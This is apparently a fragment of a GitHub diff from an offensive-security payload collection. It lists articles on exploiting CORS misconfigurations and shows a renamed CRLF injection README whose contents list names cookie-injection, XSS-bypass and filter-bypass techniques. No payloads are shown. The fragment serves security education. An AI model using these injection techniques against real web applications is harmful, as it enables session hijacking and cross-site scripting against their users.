* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
12 changes: 10 additions & 2 deletions CRLF injection/README.md → CRLF Injection/README.md
Original file line number Diff line number Diff line change
@@ -1,8 +1,16 @@
# CRLF

The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
>The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.

A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
>A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.

## Summary

- [CRLF - Add a cookie](#crlf---add-a-cookie)
- [CRLF - Add a cookie - XSS Bypass](#crlf---add-a-cookie---xss-bypass)
- [CRLF - Write HTML](#crlf---write-html)
- [CRLF - Filter Bypass](#crlf---filter-bypass)
- [References](#references)

## CRLF - Add a cookie

Expand Down
File renamed without changes.
Loading